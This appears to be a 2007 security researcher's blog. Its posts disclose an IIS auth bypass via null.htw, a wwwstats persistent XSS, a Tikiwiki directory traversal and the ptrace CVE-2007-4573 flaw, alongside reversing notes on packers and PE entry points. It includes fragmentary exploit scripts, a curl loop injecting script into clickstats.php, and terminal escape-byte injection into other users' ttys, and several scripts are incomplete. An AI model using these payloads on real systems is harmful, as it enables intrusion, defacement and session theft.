domingo, diciembre 30, 2007

Microsoft IIS ntlm and basic auth bypass

You can protect your web contents by adding ntfs acls, then you will be secure.
But you can protect your web contents by the Internet Information basic/ntlm autentication, then this will be bypassed with null.htw object.

Both authentications seem be the same, but really the object null.htw let users get any file in web directory, only if it is protected by the filesystem, will be secure.

In the exploit you can see how to use the null.htw object.

# sha0[at]
# Based on my adv:
# (CVE-2007-2815)

if [ $# != 2 ]
printf "USAGE:\t\t$0 \nExample:\t$0 /en/us/default.aspx\n\n";
exit 0

lynx -dump $evil

Is hard to believe.

jueves, diciembre 27, 2007

wwwstats vulnerable to Persistent XSS

wwwstats is a very widely used Web traffic analyser, that registers in a database the user agents, referers, downloads, etc ..

I discovered a way to inject HTML and JavaScript to the database by calling directly the clickstats.php code. This would mean mass defacing, steal admin sessions, web redirecting, WSS Worms, google-bombing and google-priorizing.

To bypass the first 'if', is necessary to fill the HTTP Referer field with something, and inject the link to the database by the link get parameter.

An attacker can inject using the link parameter or the useragent field a script which will steal admin's cookies, or make a deface, or anything else...

If magic quotes are configured at php.ini, there is no problem, in javascript \'test\' is interpreted as 'test'.

Controlling the iterations number, is possible to do the injection in the ranking position you want:

while [ 1 ]; do
'<script>XXXX</scrip>' -e
'xxx'; done

Also is possible to attack by user agent: -A 'attack'

A payload can be:

<script scr=''></script>

#jolmos (at) isecauditors (dot) com

if [ $# -ne 4 ]
echo "Usage: $0
<html or javascript to inject in downloads> "
echo "Example: $0
<script>window.location=""</script> 100"

echo 'Attacking, wait a moment'
for i in `seq 1 $3`; do curl "$1/clickstats.php?link=$2" -e 'attack'; done

External links:

Tikiwiki CMS Trasversal Directory

Tikiwiki is a full featured CMS, massively used in the world.
(search on google: tiki-index.php)

18/12/2007 I was auditing the code and found a dangerous vulnerability, that lets a malicious user get any file in the system via web (with the apache user permissions)

Mose and the coders quickly solve the problem and release the 1.9.9 version.
Free software is more secure every day thanks to the quick response of the community.

Exploit explanation:

Why this 1234 stuff?
well, the last 4 bytes of movie parameter, are erased, and then an .xml extension was appended.
Then tiki-listmovies will erase the "1234" and the null byte will ignore the extension.

Only is possible get the first 1000 bytes of the file.

The vulnerable code:

if(isset($_GET["movie"])) {
$movie = $_GET["movie"];

if ($movie) {
// Initialize movie size
$confFile = 'tikimovies/'.substr($movie,0,-4).".xml";

//trc('confFile', $confFile);
$fh = @fopen($confFile,'r');
$config = @fread($fh, 1000);
if (isset($config) && $config <>'') {
$width =
preg_replace("/^.*?(.*?)<\/MovieWidth>.*$/ms", "$1", $config);
$height =
preg_replace("/^.*?(.*?)<\/MovieHeight>.*$/ms", "$1",

viernes, octubre 26, 2007

Dangerous Bytes

Some tty scape bytes can make damage remotelly.

You can inject this byte to daemon's log, to other's tty /dev/pts/*, by irc, etc ... and put colored logs :) or invisible logs, or executing command.

0x0e Change de view mode and, the victym have to reset the terminal
0x0f Restore the view mode (like reset command)
0x1b Scape byte:

0x1b, [c inject chars to cmd
0x1b, [r page up
0x1b, [u up

0x5f close the sequence

perl -e 'print "\x1b\x[c"' > /dev/pts/4

df linux comand is 2 bytes long that are in the hexa charset,
then i'm trying to inject the df conmmand remotelly.

Apache don't log this files, is not vulnerable, but there are other clients and servers vulnerables.

lunes, septiembre 24, 2007

CVE-2007-4573 ptrace strikes again ;)

The problem discovered by Wojciech Purczynski is:
A 64bit user can say putreg(TIF_IA32) to kernel
and the kernel will enter at the if and do:

value &= 0xffffffff;

ok, lets practice 1100 & 1111 = 1100 The value remain Ok

What happens if we are in 64bits, 0xffffffff is actually 0x00000000ffffffff
Well, the beginning of value will be erased :/

Let see the explotation details.

#define TIF_IA32 17 /* 32bit process */

We know the constant value, lets see the sched function:

static inline int test_tsk_thread_flag
(struct task_struct *tsk, int flag)
return test_ti_thread_flag(task_thread_info(tsk), flag);

static inline int test_ti_thread_flag
(struct thread_info *ti, int flag)
return test_bit(flag,&ti->flags);

quite obvious the bypass :)

Let's see the ptrace call:

When we invoke the PTRACE_SETREGS, we can see that putreg is invoked for each register.

We can do
putreg(child, <register>, <value>);

by calling
ptrace(PTRACE_SETREGS, <somepid>, NULL, <user_regs_struct>)

The key: We can have a 64bits process ptracing a 32bits one, then we can exploit this flaw.

We can erase the registers, is that a potentially priviledge scalation?

Finally: Don't let the user give us a data we know yet, because the user is a motherfucker.

jueves, agosto 23, 2007

Defeating packers

I was reversing packed software, when I saw an easy way to defeat it: tracing if eip its outside a range.

When a packer extracts the code to a new maped layout, there is a moment when the execution flow is redirected to this code. We cannot put breakpoints becouse the memory is not maped, and cannot see the jump to the address becouse is like: call [eax+0CFh]

Is not possible to know wich value will take eax and wich value gets this indirect access to the memory.

But, there is a very easy way to stop the execution when the call is taken, with a eip range trace.

If you use olly, press ^T and enter the range of the current module.

In ancient times, spectrum-hackers cannot do this kind of things :)

In linux world, there are not ollydebug like debuggers :( but i think radare will be the future:

miércoles, agosto 22, 2007

PE entry calculation

The way to calculate win32 PE entry point offset is similar than linux elf's.

We have to keep in mind 3 basic concepts:

RVA -> adress relative to the beginning of de loaded PE at runtime.
(can be relative to something, is like an offset, but often is referred to a running process)
VA -> Is an absolute memory address in the loaded binary at runtime.
offset -> Is a relative address, like RVA but is relative from the beginning of the file.

Wen a binary is executed, the loader maps some parts and do some relocations, the memory map of the binary at runtime is diferent than the file image. If we map the file, we speak of offsets from the beginnig of the map/file.


Entry RVA: 12475h
PE Imagebase: 100000h

Ok, when the PE is loaded, the entry is at 112475h, easy :)
but, we have maped the file image, and we wish to know the entry's offset.

Sections has 3 important values: RVA of the section, Size of the section and offset.

We know de entry's RVA, we can check with the sections RVA in order to see where is the entry.

When we get the section RVA, becouse of we hav the sections offset, we can get the Delta between his RVA and offset, if we apply this delta to the RVA we will get the entry's offset, then we have to add the beginning of the map and will have our entry.

;We have maped the file, and eax is pointing to the beginning of the file.

   mov edx, [eax+3Ch]       ; edx -> RVA of File Header
   add edx, eax          ; edx -> VA of File Header
   mov esi, [edx+28h]       ; esi -> RVA of entry point

   lea edi, [edx+74h]       ; edi -> ptr to the beginning of section table
   mov ecx, [edx+2]       ; ecx -> number of sections
   mov ebx, [edi+0Ch]       ; ebx -> RVA of section
   mov edx, ebx
   add edx, [edi+8]       ; edx -> rva of the end of the section

   cmp esi, ebx    ; entryRVA < sectionRVA => wrong
   jl wrongEntry

   cmp esi, edx  ; entryRVA > sectionRVA + sectionSize => nextSection
   jg nextSection ; entry is out of bounds of this section, check next section.

   sub esi, ebx       ; entry calculus
   add esi, [edi+10h]
   jmp gotEntry

   add edi, [edi+8]   ; nextSection=currentSection+currentSection Size
   loop seekEntrySection